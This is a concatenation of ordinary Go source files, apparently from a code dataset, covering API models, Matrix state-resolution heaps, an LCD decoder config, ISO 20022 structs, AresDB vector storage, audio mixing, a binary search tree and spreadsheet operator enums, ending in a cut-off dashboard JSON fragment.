func NewListInternalTransactionsByAddressRIWithDefaults() *ListInternalTransactionsByAddressRI {
this := ListInternalTransactionsByAddressRI{}
return &this
}
// GetAmount returns the Amount field value
func (o *ListInternalTransactionsByAddressRI) GetAmount() string {
if o == nil {
var ret string
return ret
}
return o.Amount
}
// GetAmountOk returns a tuple with the Amount field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetAmountOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.Amount, true
}
// SetAmount sets field value
func (o *ListInternalTransactionsByAddressRI) SetAmount(v string) {
o.Amount = v
}
// GetMinedInBlockHash returns the MinedInBlockHash field value
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHash() string {
if o == nil {
var ret string
return ret
}
return o.MinedInBlockHash
}
// GetMinedInBlockHashOk returns a tuple with the MinedInBlockHash field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHash, true
}
// SetMinedInBlockHash sets field value
func (o *ListInternalTransactionsByAddressRI) SetMinedInBlockHash(v string) {
o.MinedInBlockHash = v
}
// GetMinedInBlockHeight returns the MinedInBlockHeight field value
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHeight() int32 {
if o == nil {
var ret int32
return ret
}
return o.MinedInBlockHeight
}
// GetMinedInBlockHeightOk returns a tuple with the MinedInBlockHeight field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHeightOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHeight, true
}
// SetMinedInBlockHeight sets field value
func (o *ListInternalTransactionsByAddressRI) SetMinedInBlockHeight(v int32) {
o.MinedInBlockHeight = v
}
// GetOperationID returns the OperationID field value
func (o *ListInternalTransactionsByAddressRI) GetOperationID() string {
if o == nil {
var ret string
return ret
}
return o.OperationID
}
// GetOperationIDOk returns a tuple with the OperationID field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetOperationIDOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.OperationID, true
}
// SetOperationID sets field value
func (o *ListInternalTransactionsByAddressRI) SetOperationID(v string) {
o.OperationID = v
}
// GetOperationType returns the OperationType field value
func (o *ListInternalTransactionsByAddressRI) GetOperationType() string {
if o == nil {
var ret string
return ret
}
return o.OperationType
}
// GetOperationTypeOk returns a tuple with the OperationType field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetOperationTypeOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.OperationType, true
}
// SetOperationType sets field value
func (o *ListInternalTransactionsByAddressRI) SetOperationType(v string) {
o.OperationType = v
}
// GetParentHash returns the ParentHash field value
func (o *ListInternalTransactionsByAddressRI) GetParentHash() string {
if o == nil {
var ret string
return ret
}
return o.ParentHash
}
// GetParentHashOk returns a tuple with the ParentHash field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetParentHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.ParentHash, true
}
// SetParentHash sets field value
func (o *ListInternalTransactionsByAddressRI) SetParentHash(v string) {
o.ParentHash = v
}
// GetRecipient returns the Recipient field value
func (o *ListInternalTransactionsByAddressRI) GetRecipient() string {
if o == nil {
var ret string
return ret
}
return o.Recipient
}
// GetRecipientOk returns a tuple with the Recipient field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetRecipientOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.Recipient, true
}
// SetRecipient sets field value
func (o *ListInternalTransactionsByAddressRI) SetRecipient(v string) {
o.Recipient = v
}
// GetSender returns the Sender field value
func (o *ListInternalTransactionsByAddressRI) GetSender() string {
if o == nil {
var ret string
return ret
}
return o.Sender
}
// GetSenderOk returns a tuple with the Sender field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetSenderOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.Sender, true
}
// SetSender sets field value
func (o *ListInternalTransactionsByAddressRI) SetSender(v string) {
o.Sender = v
}
// GetTimestamp returns the Timestamp field value
func (o *ListInternalTransactionsByAddressRI) GetTimestamp() int32 {
if o == nil {
var ret int32
return ret
}
return o.Timestamp
}
// GetTimestampOk returns a tuple with the Timestamp field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetTimestampOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Timestamp, true
}
// SetTimestamp sets field value
func (o *ListInternalTransactionsByAddressRI) SetTimestamp(v int32) {
o.Timestamp = v
}
func (o ListInternalTransactionsByAddressRI) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if true {
toSerialize["amount"] = o.Amount
}
if true {
toSerialize["minedInBlockHash"] = o.MinedInBlockHash
}
if true {
toSerialize["minedInBlockHeight"] = o.MinedInBlockHeight
}
if true {
toSerialize["operationID"] = o.OperationID
}
if true {
toSerialize["operationType"] = o.OperationType
}
if true {
toSerialize["parentHash"] = o.ParentHash
}
if true {
toSerialize["recipient"] = o.Recipient
}
if true {
toSerialize["sender"] = o.Sender
}
if true {
toSerialize["timestamp"] = o.Timestamp
}
return json.Marshal(toSerialize)
}
type NullableListInternalTransactionsByAddressRI struct {
value *ListInternalTransactionsByAddressRI
isSet bool
}
func (v NullableListInternalTransactionsByAddressRI) Get() *ListInternalTransactionsByAddressRI {
return v.value
}
func (v *NullableListInternalTransactionsByAddressRI) Set(val *ListInternalTransactionsByAddressRI) {
v.value = val
v.isSet = true
}
func (v NullableListInternalTransactionsByAddressRI) IsSet() bool {
return v.isSet
}
func (v *NullableListInternalTransactionsByAddressRI) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableListInternalTransactionsByAddressRI(val *ListInternalTransactionsByAddressRI) *NullableListInternalTransactionsByAddressRI {
return &NullableListInternalTransactionsByAddressRI{value: val, isSet: true}
}
func (v NullableListInternalTransactionsByAddressRI) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableListInternalTransactionsByAddressRI) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | model_list_internal_transactions_by_address_ri.go | 0.858955 | 0.452838 | model_list_internal_transactions_by_address_ri.go | starcoder |
package gomatrixserverlib
import (
"strings"
)
// A stateResV2ConflictedPowerLevel is used to sort the events by effective
// power level, origin server TS and the lexicographical comparison of event
// IDs. It is a bit of an optimisation to use this - by working out the
// effective power level etc ahead of time, we use less CPU cycles during the
// sort.
type stateResV2ConflictedPowerLevel struct {
powerLevel int
originServerTS int64
eventID string
event *Event
}
// A stateResV2ConflictedPowerLevelHeap is used to sort the events using
// sort.Sort or by using the heap functions for further optimisation. Sorting
// ensures that the results are deterministic.
type stateResV2ConflictedPowerLevelHeap []*stateResV2ConflictedPowerLevel
// Len implements sort.Interface
func (s stateResV2ConflictedPowerLevelHeap) Len() int {
return len(s)
}
// Less implements sort.Interface
func (s stateResV2ConflictedPowerLevelHeap) Less(i, j int) bool {
// Try to tiebreak on the effective power level
if s[i].powerLevel > s[j].powerLevel {
return true
}
if s[i].powerLevel < s[j].powerLevel {
return false
}
// If we've reached here then s[i].powerLevel == s[j].powerLevel
// so instead try to tiebreak on origin server TS
if s[i].originServerTS < s[j].originServerTS {
return false
}
if s[i].originServerTS > s[j].originServerTS {
return true
}
// If we've reached here then s[i].originServerTS == s[j].originServerTS
// so instead try to tiebreak on a lexicographical comparison of the event ID
return strings.Compare(s[i].eventID[:], s[j].eventID[:]) > 0
}
// Swap implements sort.Interface
func (s stateResV2ConflictedPowerLevelHeap) Swap(i, j int) {
s[i], s[j] = s[j], s[i]
}
// Push implements heap.Interface
func (s *stateResV2ConflictedPowerLevelHeap) Push(x interface{}) {
*s = append(*s, x.(*stateResV2ConflictedPowerLevel))
}
// Pop implements heap.Interface
func (s *stateResV2ConflictedPowerLevelHeap) Pop() interface{} {
old := *s
n := len(old)
x := old[n-1]
*s = old[:n-1]
return x
}
// A stateResV2ConflictedOther is used to sort the events by power level
// mainline positions, origin server TS and the lexicographical comparison of
// event IDs. It is a bit of an optimisation to use this - by working out the
// effective power level etc ahead of time, we use less CPU cycles during the
// sort.
type stateResV2ConflictedOther struct {
mainlinePosition int
originServerTS int64
eventID string
event *Event
}
// A stateResV2ConflictedOtherHeap is used to sort the events using
// sort.Sort or by using the heap functions for further optimisation. Sorting
// ensures that the results are deterministic.
type stateResV2ConflictedOtherHeap []*stateResV2ConflictedOther
// Len implements sort.Interface
func (s stateResV2ConflictedOtherHeap) Len() int {
return len(s)
}
// Less implements sort.Interface
func (s stateResV2ConflictedOtherHeap) Less(i, j int) bool {
// Try to tiebreak on the mainline position
if s[i].mainlinePosition < s[j].mainlinePosition {
return false
}
if s[i].mainlinePosition > s[j].mainlinePosition {
return true
}
// If we've reached here then s[i].mainlinePosition == s[j].mainlinePosition
// so instead try to tiebreak on origin server TS
if s[i].originServerTS < s[j].originServerTS {
return true
}
if s[i].originServerTS > s[j].originServerTS {
return false
}
// If we've reached here then s[i].originServerTS == s[j].originServerTS
// so instead try to tiebreak on a lexicographical comparison of the event ID
return strings.Compare(s[i].eventID[:], s[j].eventID[:]) < 0
}
// Swap implements sort.Interface
func (s stateResV2ConflictedOtherHeap) Swap(i, j int) {
s[i], s[j] = s[j], s[i]
}
// Push implements heap.Interface
func (s *stateResV2ConflictedOtherHeap) Push(x interface{}) {
*s = append(*s, x.(*stateResV2ConflictedOther))
}
// Pop implements heap.Interface
func (s *stateResV2ConflictedOtherHeap) Pop() interface{} {
old := *s
n := len(old)
x := old[n-1]
*s = old[:n-1]
return x
} | stateresolutionv2heaps.go | 0.672869 | 0.41947 | stateresolutionv2heaps.go | starcoder |
package lcd
import (
"fmt"
"strconv"
"github.com/aamcrae/config"
)
// Create a 7 segment decoder using the configuration data provided.
func CreateLcdDecoder(conf config.Conf) (*LcdDecoder, error) {
var xoff, yoff int
l := NewLcdDecoder()
// threshold is a percentage defining the point between the
// min and max sampled values where 'on' and 'off' are measured.
t := conf.Get("threshold")
if len(t) > 0 {
v := readInts(t[0].Tokens)
if len(v) == 1 {
l.Threshold = v[0]
}
}
// offset defines a bulk adjustment to all digits, as x and y offsets.
o := conf.Get("offset")
if len(o) > 0 {
v := readInts(o[0].Tokens)
if len(v) == 2 {
xoff = v[0]
yoff = v[1]
}
}
// lcd defines one 7 segment digit template.
// The format is a name followed by 3 pairs of x/y offsets defining the corners
// of the digit (relative to implied top left of 0,0), followed by a value defining
// the pixel width of the segment elements.
for _, e := range conf.Get("lcd") {
if len(e.Tokens) < 1 {
return nil, fmt.Errorf("No config for template at line %d", e.Lineno)
}
name := e.Tokens[0]
v := readInts(e.Tokens[1:])
var dp []int
if len(v) == 9 {
dp = v[7:9]
} else if len(v) != 7 {
return nil, fmt.Errorf("Bad config for template at line %d", e.Lineno)
}
if err := l.AddTemplate(name, v[:6], dp, v[6]); err != nil {
return nil, fmt.Errorf("Invalid config at line %d: %v", e.Lineno, err)
}
}
// digit declares an instance of a digit.
// A string references the template name, followed by the point (x,y) defining
// the top left corner of the digit (adjusted using the global offset).
for _, e := range conf.Get("digit") {
if len(e.Tokens) != 3 && len(e.Tokens) != 5 {
return nil, fmt.Errorf("Bad digit config line %d", e.Lineno)
}
v := readInts(e.Tokens[1:])
if len(v) != 2 && len(v) != 4 {
return nil, fmt.Errorf("Bad config for digit at line %d", e.Lineno)
}
_, err := l.AddDigit(e.Tokens[0], v[0]+xoff, v[1]+yoff)
if err != nil {
return nil, fmt.Errorf("Invalid digit config at line %d: %v", e.Lineno, err)
}
}
return l, nil
}
func readInts(strs []string) []int {
vals := []int{}
for _, s := range strs {
if v, err := strconv.ParseInt(s, 10, 32); err != nil {
break
} else {
vals = append(vals, int(v))
}
}
return vals
} | config.go | 0.660829 | 0.438605 | config.go | starcoder |
package iso20022
// Provides information on the status of a trade.
type TradeData1 struct {
// Refers to the identification of a notification.
NotificationIdentification *Max35Text `xml:"NtfctnId"`
// Reference to the unique identification assigned to a trade by a central matching system.
MatchingSystemUniqueReference *Max35Text `xml:"MtchgSysUnqRef"`
// Identifies the party which assigned a status to a treasury trade.
StatusOriginator *Max35Text `xml:"StsOrgtr,omitempty"`
// Specifies the new status of a trade.
CurrentStatus *TradeStatus1Code `xml:"CurSts"`
// Description of the status of a trade when no coded form is available.
ExtendedCurrentStatus *Extended350Code `xml:"XtndedCurSts"`
// Additional information on the current status of a trade in a central system.
CurrentStatusSubType *Max70Text `xml:"CurStsSubTp,omitempty"`
// Specifies the time at which the current status was assigned.
CurrentStatusTime *ISODateTime `xml:"CurStsTm,omitempty"`
// Specifies the previous status of a trade.
PreviousStatus *TradeStatus1Code `xml:"PrvsSts,omitempty"`
// Description of the status of a trade when no coded form is available.
ExtendedPreviousStatus *Extended350Code `xml:"XtndedPrvsSts,omitempty"`
// Additional information on the previous status of a trade in a central system.
PreviousStatusSubType *Max70Text `xml:"PrvsStsSubTp,omitempty"`
// Specifies the time at which the previous status was assigned.
PreviousStatusTime *ISODateTime `xml:"PrvsStsTm,omitempty"`
// Specifies the product for which the status of the confirmation is reported.
ProductType *Max4AlphaNumericText `xml:"PdctTp,omitempty"`
}
func (t *TradeData1) SetNotificationIdentification(value string) {
t.NotificationIdentification = (*Max35Text)(&value)
}
func (t *TradeData1) SetMatchingSystemUniqueReference(value string) {
t.MatchingSystemUniqueReference = (*Max35Text)(&value)
}
func (t *TradeData1) SetStatusOriginator(value string) {
t.StatusOriginator = (*Max35Text)(&value)
}
func (t *TradeData1) SetCurrentStatus(value string) {
t.CurrentStatus = (*TradeStatus1Code)(&value)
}
func (t *TradeData1) SetExtendedCurrentStatus(value string) {
t.ExtendedCurrentStatus = (*Extended350Code)(&value)
}
func (t *TradeData1) SetCurrentStatusSubType(value string) {
t.CurrentStatusSubType = (*Max70Text)(&value)
}
func (t *TradeData1) SetCurrentStatusTime(value string) {
t.CurrentStatusTime = (*ISODateTime)(&value)
}
func (t *TradeData1) SetPreviousStatus(value string) {
t.PreviousStatus = (*TradeStatus1Code)(&value)
}
func (t *TradeData1) SetExtendedPreviousStatus(value string) {
t.ExtendedPreviousStatus = (*Extended350Code)(&value)
}
func (t *TradeData1) SetPreviousStatusSubType(value string) {
t.PreviousStatusSubType = (*Max70Text)(&value)
}
func (t *TradeData1) SetPreviousStatusTime(value string) {
t.PreviousStatusTime = (*ISODateTime)(&value)
}
func (t *TradeData1) SetProductType(value string) {
t.ProductType = (*Max4AlphaNumericText)(&value)
} | TradeData1.go | 0.770292 | 0.422505 | TradeData1.go | starcoder |
package memstore
import (
"bufio"
"fmt"
"github.com/uber/aresdb/memstore/common"
"github.com/uber/aresdb/memstore/list"
"github.com/uber/aresdb/utils"
"io"
"os"
"reflect"
"unsafe"
)
// cLiveVectorParty is the implementation of LiveVectorParty with c allocated memory
// this vector party stores columns with fixed length data type
type cLiveVectorParty struct {
cVectorParty
}
// SetBool implements SetBool in LiveVectorParty interface
func (vp *cLiveVectorParty) SetBool(offset int, val bool, valid bool) {
vp.setValidity(offset, valid)
vp.values.SetBool(offset, val)
return
}
// SetBool implements SetValue in LiveVectorParty interface
func (vp *cLiveVectorParty) SetValue(offset int, val unsafe.Pointer, valid bool) {
vp.setValidity(offset, valid)
if valid {
vp.values.SetValue(offset, val)
} else {
var zero [2]uint64
vp.values.SetValue(offset, unsafe.Pointer(&zero))
}
}
// SetGoValue implements SetGoValue in LiveVectorParty interface
func (vp *cLiveVectorParty) SetGoValue(offset int, val common.GoDataValue, valid bool) {
panic("SetGoValue is not supported in cLiveVectorParty")
}
// GetValue implements GetValue in LiveVectorParty interface
func (vp *cLiveVectorParty) GetValue(offset int) (unsafe.Pointer, bool) {
return vp.values.GetValue(offset), vp.GetValidity(offset)
}
// goLiveVectorParty is the implementation of LiveVectorParty with go allocated memory
// this vector party stores columns with variable length data type
type goLiveVectorParty struct {
baseVectorParty
values []common.GoDataValue
hostMemoryManager common.HostMemoryManager
totalBytes int64
}
// GetMinMaxValue implements GetMinMaxValue in LiveVectorParty interface
func (vp *cLiveVectorParty) GetMinMaxValue() (min uint32, max uint32) {
return vp.values.GetMinValue(), vp.values.GetMaxValue()
}
// Allocate implements Allocate in VectorParty interface
func (vp *cLiveVectorParty) Allocate(hasCount bool) {
vp.cVectorParty.Allocate(hasCount)
vp.fillWithDefaultValue()
}
// Allocate implements Allocate in VectorParty interface
func (vp *goLiveVectorParty) Allocate(hasCount bool) {
vp.values = make([]common.GoDataValue, vp.length)
}
// SetDataValue implements SetDataValue in VectorParty interface
// liveVectorParty ignores countsUpdateMode or counts
func (vp *goLiveVectorParty) SetDataValue(offset int, value common.DataValue,
countsUpdateMode common.ValueCountsUpdateMode, counts ...uint32) {
vp.SetGoValue(offset, value.GoVal, value.Valid)
}
// SetBool implements SetBool in LiveVectorParty interface
func (vp *goLiveVectorParty) SetBool(offset int, val bool, valid bool) {
panic("SetBool is not supported in goLiveVectorParty")
}
// SetValue implements SetValue in LiveVectorParty interface
func (vp *goLiveVectorParty) SetValue(offset int, val unsafe.Pointer, valid bool) {
panic("SetValue is not supported in goLiveVectorParty")
}
// GetValue implements GetValue in LiveVectorParty interface
func (vp *goLiveVectorParty) GetValue(offset int) (unsafe.Pointer, bool) {
panic("GetValue is not supported in goLiveVectorParty")
}
// SetGoValue implements SetGoValue in LiveVectorParty interface
func (vp *goLiveVectorParty) SetGoValue(offset int, val common.GoDataValue, valid bool) {
oldBytes, newBytes := 0, 0
if vp.values[offset] != nil {
oldBytes = vp.values[offset].GetBytes()
}
if !valid || val == nil {
newBytes = 0
vp.values[offset] = nil
} else {
newBytes = val.GetBytes()
vp.values[offset] = val
}
bytesChange := int64(newBytes - oldBytes)
vp.hostMemoryManager.ReportUnmanagedSpaceUsageChange(bytesChange)
vp.totalBytes += bytesChange
}
// GetDataValue implements GetDataValue in VectorParty interface
func (vp *goLiveVectorParty) GetDataValue(offset int) common.DataValue {
val := common.DataValue{
Valid: vp.GetValidity(offset),
DataType: vp.dataType,
}
if !val.Valid {
return val
}
val.GoVal = vp.values[offset]
return val
}
// GetDataValueByRow implements GetDataValueByRow in VectorParty interface
func (vp *goLiveVectorParty) GetDataValueByRow(row int) common.DataValue {
return vp.GetDataValue(row)
}
// GetValidity implements GetValidity in VectorParty interface
func (vp *goLiveVectorParty) GetValidity(offset int) bool {
return vp.values[offset] != nil
}
// GetMinMaxValue is **not supported** by goLiveVectorParty
func (vp *goLiveVectorParty) GetMinMaxValue() (min uint32, max uint32) {
return 0, 0
}
// GetBytes implements GetBytes in VectorParty interface
func (vp *goLiveVectorParty) GetBytes() int64 {
return vp.totalBytes
}
// Slice implements Slice in VectorParty interface
func (vp *goLiveVectorParty) Slice(startRow, numRows int) common.SlicedVector {
beginIndex := startRow
// size is the number of entries in the vector,
size := vp.length - beginIndex
if size < 0 {
size = 0
}
if size > numRows {
size = numRows
}
vector := common.SlicedVector{
Values: make([]interface{}, size),
Counts: make([]int, size),
}
for i := 0; i < size; i++ {
vector.Values[i] = vp.GetDataValue(beginIndex + i).ConvertToHumanReadable(vp.dataType)
vector.Counts[i] = i + 1
}
return vector
}
// Write implements Write in VectorParty interface
func (vp *goLiveVectorParty) Write(writer io.Writer) error {
bufferWriter := bufio.NewWriter(writer)
dataWriter := utils.NewStreamDataWriter(bufferWriter)
// write total bytes for reporting during loading
err := dataWriter.WriteUint64(uint64(vp.GetBytes()))
if err != nil {
return err
}
// write length
err = dataWriter.WriteUint32(uint32(vp.length))
if err != nil {
return err
}
// count non nil values
numValidValues := 0
for _, value := range vp.values {
if value != nil {
numValidValues++
}
}
// write number of valid values
err = dataWriter.WriteUint32(uint32(numValidValues))
if err != nil {
return err
}
allValid := numValidValues == vp.length
// write values
for i, value := range vp.values {
if value != nil {
// only write index if not all valid
if !allValid {
err = dataWriter.WriteUint32(uint32(i))
if err != nil {
return err
}
}
err = value.Write(&dataWriter)
if err != nil {
return err
}
}
}
return bufferWriter.Flush()
}
// Read implements Read in VectorParty interface
func (vp *goLiveVectorParty) Read(reader io.Reader, serializer common.VectorPartySerializer) error {
dataReader := utils.NewStreamDataReader(reader)
// read total bytes for reporting during loading
totalBytes, err := dataReader.ReadUint64()
if err != nil {
return err
}
vp.totalBytes = int64(totalBytes)
serializer.ReportVectorPartyMemoryUsage(int64(totalBytes * utils.GolangMemoryFootprintFactor))
length, err := dataReader.ReadUint32()
if err != nil {
return err
}
vp.length = int(length)
vp.Allocate(false)
numValidValues, err := dataReader.ReadUint32()
if err != nil {
return err
}
allValid := numValidValues == uint32(vp.length)
for i := 0; i < int(numValidValues); i++ {
var index uint32
if !allValid {
index, err = dataReader.ReadUint32()
if err != nil {
return err
}
} else {
index = uint32(i)
}
goValue := common.GetGoDataValue(vp.dataType)
err = goValue.Read(&dataReader)
if err != nil {
return err
}
vp.values[index] = goValue
}
return nil
}
// SafeDestruct implements SafeDestruct in VectorParty interface
func (vp *goLiveVectorParty) SafeDestruct() {
for i := range vp.values {
vp.values[i] = nil
}
vp.values = nil
vp.length = 0
}
// Equals implements Equals in VectorParty interface
func (vp *goLiveVectorParty) Equals(other common.VectorParty) bool {
if vp == nil || other == nil {
return vp == nil && other == nil
}
if vp.dataType != other.GetDataType() {
return false
}
if vp.GetLength() != other.GetLength() {
return false
}
otherVP, ok := other.(*goLiveVectorParty)
if !ok {
return false
}
for i, ptr := range vp.values {
if ptr == nil {
if otherVP.values[i] != nil {
return false
}
} else {
if !reflect.DeepEqual(vp.values[i], otherVP.values[i]) {
return false
}
}
}
return true
}
func (vp *goLiveVectorParty) Dump(file *os.File) {
fmt.Fprintf(file, "\nGO LiveVectorParty, type: %s, length: %d, value: \n", common.DataTypeName[vp.dataType], vp.GetLength())
for i := 0; i < vp.GetLength(); i++ {
val := vp.GetDataValue(i)
if val.Valid {
fmt.Fprintf(file, "\t%v\n", val.ConvertToHumanReadable(vp.dataType))
} else {
fmt.Println(file, "\tnil")
}
}
}
// NewLiveVectorParty creates LiveVectorParty
func NewLiveVectorParty(length int, dataType common.DataType, defaultValue common.DataValue, hostMemoryManager common.HostMemoryManager) common.LiveVectorParty {
isGoType := common.IsGoType(dataType)
if isGoType {
return newGoLiveVetorParty(length, dataType, hostMemoryManager)
}
if common.IsArrayType(dataType) {
return list.NewLiveVectorParty(length, dataType, hostMemoryManager)
}
return newCLiveVectorParty(length, dataType, defaultValue)
}
// newCLiveVectorParty creates a LiveVectorParty with c allocated memory
func newCLiveVectorParty(length int, dataType common.DataType, defaultValue common.DataValue) *cLiveVectorParty {
vp := &cLiveVectorParty{
cVectorParty: cVectorParty{
baseVectorParty: baseVectorParty{
length: length,
dataType: dataType,
defaultValue: defaultValue,
},
},
}
return vp
}
// newGoLiveVetorParty creates a LiveVectorParty with go allocated memory
func newGoLiveVetorParty(length int, dataType common.DataType, hostMemoryManager common.HostMemoryManager) *goLiveVectorParty {
vp := &goLiveVectorParty{
baseVectorParty: baseVectorParty{
length: length,
dataType: dataType,
defaultValue: common.NullDataValue,
},
hostMemoryManager: hostMemoryManager,
}
return vp
} | memstore/live_vector_party.go | 0.658527 | 0.422326 | live_vector_party.go | starcoder |
package router
import (
"github.com/kwoodhouse93/audio-playground/source"
"github.com/kwoodhouse93/audio-playground/types"
)
// Gain returns a filter that multiplies the signals in the buffer by a constant value
func Gain(src source.Source, gain float32) source.Source {
return func(step int) types.Sample {
in := src(step)
return in.Gain(gain)
}
}
// Sum2 returns a filter that adds two signals together
// Be careful using this without first reducing the gain of the sources
func Sum2(src1, src2 source.Source) source.Source {
return func(step int) types.Sample {
s1 := src1(step)
s2 := src2(step)
return s1.Sum(s2)
}
}
// Sum2Comp returns a function that adds two signals together and reduces
// their volume to compensate for the addition
func Sum2Comp(src1, src2 source.Source) source.Source {
return func(step int) types.Sample {
s1 := src1(step)
s2 := src2(step)
return s1.Sum(s2).Gain(0.5)
}
}
// Sum returns a filter that adds multiple signals together
// Failing to reduce the gain of these signals will likely cause severe clipping
func Sum(srcs ...source.Source) source.Source {
out := srcs[0]
for _, src := range srcs[1:] {
out = Sum2(out, src)
}
return out
}
// SumComp returns a filter that adds multiple signals but compensates for
// the increase in volume that this would result in
func SumComp(srcs ...source.Source) source.Source {
compGain := 1 / (float32(len(srcs)))
out := srcs[0]
for _, src := range srcs[1:] {
out = Sum2(Gain(out, compGain), Gain(src, compGain))
}
return out
}
// Mixer2 returns a filter that mixes two signals together
func Mixer2(src1, src2 source.Source, gain1, gain2 float32) source.Source {
return Sum2(
Gain(src1, gain1),
Gain(src2, gain2),
)
}
//SourceGain represents a source and gain pair to use in a Mixer
type SourceGain struct {
Source source.Source
Gain float32
}
// Mixer returns a filter that mixes any number of signals together
func Mixer(inputs []SourceGain) source.Source {
sources := make([]source.Source, len(inputs))
for i, input := range inputs {
sources[i] = Gain(input.Source, input.Gain)
}
return Sum(sources...)
} | router/router.go | 0.830937 | 0.455259 | router.go | starcoder |
package bst
import (
"bufio"
"fmt"
"io"
"strings"
)
// Order specifies a tree traversal order for a Tree's Walk method.
type Order int
// Possible Order values.
const (
PreOrder Order = iota
InOrder
PostOrder
)
// A Tree is a basic binary search tree.
type Tree struct {
root *Node
}
// ParseTree creates a Tree using an input series of "key,value" pair strings
// separated by newlines.
func ParseTree(r io.Reader) (*Tree, error) {
s := bufio.NewScanner(r)
var t Tree
for s.Scan() {
text := s.Text()
ss := strings.Split(text, ",")
if len(ss) != 2 {
return nil, fmt.Errorf("bst: malformed tree entry: %q", text)
}
t.Insert(ss[0], ss[1])
}
if err := s.Err(); err != nil {
return nil, err
}
return &t, nil
}
// Insert inserts a new key/value pair Node into the Tree.
func (t *Tree) Insert(key, value string) {
if t.root == nil {
t.root = node(key, value)
return
}
t.root.insert(node(key, value))
}
// Walk walks each Node in the tree using the specified Order.
func (t *Tree) Walk(order Order, fn func(n *Node)) {
if t.root == nil {
return
}
t.root.walk(order, fn)
}
// Search determines if key is present in the tree, returning its value and
// whether or not the key was found.
func (t *Tree) Search(key string) (string, bool) {
if t.root == nil {
return "", false
}
return t.root.search(key)
}
// node is a shortcut for creating a Node.
func node(key, value string) *Node {
return &Node{
Key: key,
Value: value,
}
}
// A Node is a key/value pair Node in a Tree.
type Node struct {
Key string
Value string
left *Node
right *Node
}
func (n *Node) insert(x *Node) {
// Pick which pointer we are using to insert the new Node.
ptr := &n.left
if n.Key < x.Key {
ptr = &n.right
}
if *ptr != nil {
// Recursively insert the node.
(*ptr).insert(x)
} else {
// Pointer is nil, add a new node.
*ptr = x
}
}
func (n *Node) walk(order Order, fn func(n *Node)) {
if n == nil {
return
}
// The order these functions are invoked is determined by the Order value.
var (
rootFn = func() { fn(n) }
leftFn = func() { n.left.walk(order, fn) }
rightFn = func() { n.right.walk(order, fn) }
)
var try [3]func()
switch order {
case PreOrder:
try = [3]func(){rootFn, leftFn, rightFn}
case InOrder:
try = [3]func(){leftFn, rootFn, rightFn}
case PostOrder:
try = [3]func(){leftFn, rightFn, rootFn}
default:
panic("bst: Node.walk called with unknown Order value")
}
for _, fn := range try {
fn()
}
}
func (n *Node) search(key string) (string, bool) {
if n == nil {
return "", false
}
switch strings.Compare(key, n.Key) {
case 0:
return n.Value, true
case -1:
return n.left.search(key)
case 1:
return n.right.search(key)
}
panic("bst: Node.search hit unreachable code")
} | go/algorithms/bst/bst.go | 0.726426 | 0.421433 | bst.go | starcoder |
package primitives
import (
"encoding/xml"
)
//ConditionOperatorType is a direct mapping of XSD ST_ConditionalFormattingOperator
type ConditionOperatorType byte
//ConditionOperatorType maps for marshal/unmarshal process
var (
ToConditionOperatorType map[string]ConditionOperatorType
FromConditionOperatorType map[ConditionOperatorType]string
)
//List of all possible values for OperatorType
const (
_ ConditionOperatorType = iota
ConditionOperatorLessThan
ConditionOperatorLessThanOrEqual
ConditionOperatorEqual
ConditionOperatorNotEqual
ConditionOperatorGreaterThanOrEqual
ConditionOperatorGreaterThan
ConditionOperatorBetween
ConditionOperatorNotBetween
ConditionOperatorContainsText
ConditionOperatorNotContains
ConditionOperatorBeginsWith
ConditionOperatorEndsWith
)
func init() {
FromConditionOperatorType = map[ConditionOperatorType]string{
ConditionOperatorLessThan: "lessThan",
ConditionOperatorLessThanOrEqual: "lessThanOrEqual",
ConditionOperatorEqual: "equal",
ConditionOperatorNotEqual: "notEqual",
ConditionOperatorGreaterThanOrEqual: "greaterThanOrEqual",
ConditionOperatorGreaterThan: "greaterThan",
ConditionOperatorBetween: "between",
ConditionOperatorNotBetween: "notBetween",
ConditionOperatorContainsText: "containsText",
ConditionOperatorNotContains: "notContains",
ConditionOperatorBeginsWith: "beginsWith",
ConditionOperatorEndsWith: "endsWith",
}
ToConditionOperatorType = make(map[string]ConditionOperatorType, len(FromConditionOperatorType))
for k, v := range FromConditionOperatorType {
ToConditionOperatorType[v] = k
}
}
func (t ConditionOperatorType) String() string {
return FromConditionOperatorType[t]
}
//MarshalXMLAttr marshal ConditionOperatorType
func (t *ConditionOperatorType) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
attr := xml.Attr{Name: name}
if v, ok := FromConditionOperatorType[*t]; ok {
attr.Value = v
} else {
attr = xml.Attr{}
}
return attr, nil
}
//UnmarshalXMLAttr unmarshal ConditionOperatorType
func (t *ConditionOperatorType) UnmarshalXMLAttr(attr xml.Attr) error {
if v, ok := ToConditionOperatorType[attr.Value]; ok {
*t = v
}
return nil
} | internal/ml/primitives/condition_operator.go | 0.643329 | 0.446374 | condition_operator.go | starcoder |
package cmd
const dashboardJsonV3 = `
{
"id": 1,
"title": "Belt",
"originalTitle": "Belt",
"tags": [],
"style": "dark",
"timezone": "browser",
"editable": true,
